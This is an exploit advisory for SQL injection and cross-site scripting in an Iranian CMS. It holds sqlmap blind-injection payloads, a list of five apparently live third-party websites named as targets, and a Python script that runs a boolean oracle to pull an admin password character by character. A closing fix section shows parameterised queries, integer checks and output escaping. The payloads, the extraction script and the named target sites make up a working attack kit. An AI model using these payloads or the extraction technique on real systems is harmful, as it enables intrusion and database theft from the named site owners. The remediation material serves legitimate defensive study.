[+] Exploit Title : Resane BarTar CMS SQL Injection / Cross Site Scripting Vulnerability
[+] Date : 2018-08-11
[+] Author : Work LearninG
[+] Vendor Homepage : http://resanebartar.ir
[+] Version : ...
[+] Dork : N/A
[+] My Site : https://worklearning.ir
[+] Tested On : Windows 10 - Kali Linux 2.0
[+] Contact : support@worklearning.ir
[+] Description :
[!] Free content management system (CMS).
[+] Poc :
[!] http://localhost/page/divan?item=sqli
[+] Parameter: idcat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idcat=30') AND 9195=9195 AND ('rqdf'='rqdf

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idcat=30') AND SLEEP(5) AND ('iGES'='iGES
[+] web application technology: PHP 5.3.29 (the 5.3 branch has been end-of-life since August 2014)
[+] back-end DBMS: MySQL >= 5.0.12
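The boolean-based payload above only works against a query that wraps the parameter in a quoted, parenthesised literal, and once it works it hands the attacker a one-bit oracle that sqlmap drives to read the database. The following is an added example, not code from this advisory or from the CMS: it reconstructs an assumed `WHERE (idcat='...')` query (the CMS source is not published here, so the query shape is an inference from the payload), runs it against a constructed SQLite table standing in for the real MySQL backend (which is why the SLEEP() variant is not shown), and uses the same `30') AND ... AND ('rqdf'='rqdf` wrapper to pull a string out of a second table one character at a time. The table names, rows and the `admin` credential are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the CMS database (sample data, not the vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gallery (id INTEGER PRIMARY KEY, idcat INTEGER, title TEXT);
        INSERT INTO gallery VALUES (1, 30, 'first'), (2, 30, 'second'), (3, 22, 'other');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


def vulnerable_allgallary(conn, idcat):
    """ASSUMED shape of the query behind allgallary.php.

    The sqlmap payload closes a "('...')" pair, so the parameter is spliced
    into a parenthesised, single-quoted literal by string formatting."""
    sql = "SELECT title FROM gallery WHERE (idcat='%s')" % idcat
    return [row[0] for row in conn.execute(sql)]


def page_differs(conn, condition):
    """Boolean oracle built from the advisory's wrapper: True when the injected
    SQL condition is true (rows come back), False when the page is empty."""
    payload = "30') AND (%s) AND ('rqdf'='rqdf" % condition
    return len(vulnerable_allgallary(conn, payload)) > 0


def extract_string(conn, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time through the
    oracle, binary-searching each code point in 0..127 (about 7 requests per
    character instead of up to 128 linear guesses)."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position.
        if not page_differs(conn, "length((%s)) >= %d" % (subquery, pos)):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if page_differs(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print("normal request:", vulnerable_allgallary(db, "30"))
    print("true payload:  ", vulnerable_allgallary(db, "30') AND 9195=9195 AND ('rqdf'='rqdf"))
    print("false payload: ", vulnerable_allgallary(db, "30') AND 9195=9196 AND ('rqdf'='rqdf"))
    print("admin password:", extract_string(db, "SELECT password FROM users WHERE username='admin'"))
```

The true and false payloads are the only two page states the attacker needs; everything else is a matter of request count. Against the MySQL target the `unicode()`/`substr()` pair would be `ORD(SUBSTRING(...))`, and the time-based payload replaces the row-count difference with a response-time difference when the page content gives nothing away.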
[+] Targets :
[!] http://resanebartar.ir/pages/allgallary?idcat=22
[!] http://gallerymaryam.ir/pages/divan?item=87
[!] http://modernclassicfurniture.ir/pages/allgallary.php?idcat=11
[!] http://www.parnianco.com/pages/allgallary.php?idcatall=2&idcat=9
[!] http://decoco.ir/pages/allgallaryy?idcat=30
[+] Security Level :
[!] Medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Link :
[*] http://localhost/admin.php
[+] Vulnerable File(s) :
[!] allgallary.php | allgallery | divan
[+] Fix :
[!] Stop building the query by string concatenation. Bind idcat (and item) as a parameter with prepared statements (PDO or mysqli), and reject or cast the value to an integer before use, since a category id is never anything but a number. For the reflected output, HTML-encode values before writing them into the page (htmlspecialchars with ENT_QUOTES). Replacing "bad characters" with a blacklist is not a reliable fix.
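A concrete version of the fix, as an added example rather than the vendor's patch, written in Python with SQLite standing in for the PHP/MySQL code (the `gallery` table and its rows are constructed sample data): the category id is validated as an integer, the query binds it as a parameter, and the title text is HTML-encoded before rendering. The `bound_only` function shows that even without the integer check, a bound parameter turns the sqlmap payload into a literal string that matches nothing.

```python
import html
import sqlite3


def make_gallery_db():
    """Constructed sample rows; the real schema is not published in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gallery (id INTEGER PRIMARY KEY, idcat INTEGER, title TEXT);
        INSERT INTO gallery VALUES (1, 30, 'first'), (2, 30, 'second'), (3, 22, 'other');
    """)
    return conn


def parse_idcat(raw):
    """Validate the GET parameter before it gets anywhere near SQL.

    Returns an int, or None for anything that is not a plain unsigned integer
    (the real handler would answer HTTP 400 in that case)."""
    if raw is None or not raw.isdigit():
        return None
    return int(raw)


def safe_allgallary(conn, raw_idcat):
    """Hardened handler: integer validation plus a parameterised query."""
    idcat = parse_idcat(raw_idcat)
    if idcat is None:
        return []
    # The value is bound by the driver, never spliced into the SQL text.
    rows = conn.execute("SELECT title FROM gallery WHERE idcat = ?", (idcat,))
    return [r[0] for r in rows]


def bound_only(conn, raw_idcat):
    """Parameter binding alone, with no type check: the payload is compared as
    one opaque string against the idcat column and matches no row."""
    rows = conn.execute("SELECT title FROM gallery WHERE idcat = ?", (raw_idcat,))
    return [r[0] for r in rows]


def render_title(title):
    """Output encoding for the page: every title is escaped at the point it is
    written into HTML, so a stored or reflected <script> stays inert text."""
    return "<h2>%s</h2>" % html.escape(title, quote=True)


if __name__ == "__main__":
    db = make_gallery_db()
    payload = "30') AND 9195=9195 AND ('rqdf'='rqdf"
    print("validated + bound, idcat=30:", safe_allgallary(db, "30"))
    print("validated + bound, payload: ", safe_allgallary(db, payload))
    print("bound only, payload:        ", bound_only(db, payload))
    print(render_title("<script>alert(1)</script>"))
```

In the PHP original the same two steps are `(int)$_GET['idcat']` (or a `ctype_digit` check) followed by `$stmt = $pdo->prepare('... WHERE idcat = ?'); $stmt->execute([$idcat]);`, and `htmlspecialchars($title, ENT_QUOTES, 'UTF-8')` at output time.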
[+] We Are : [+] 0P3N3R [+]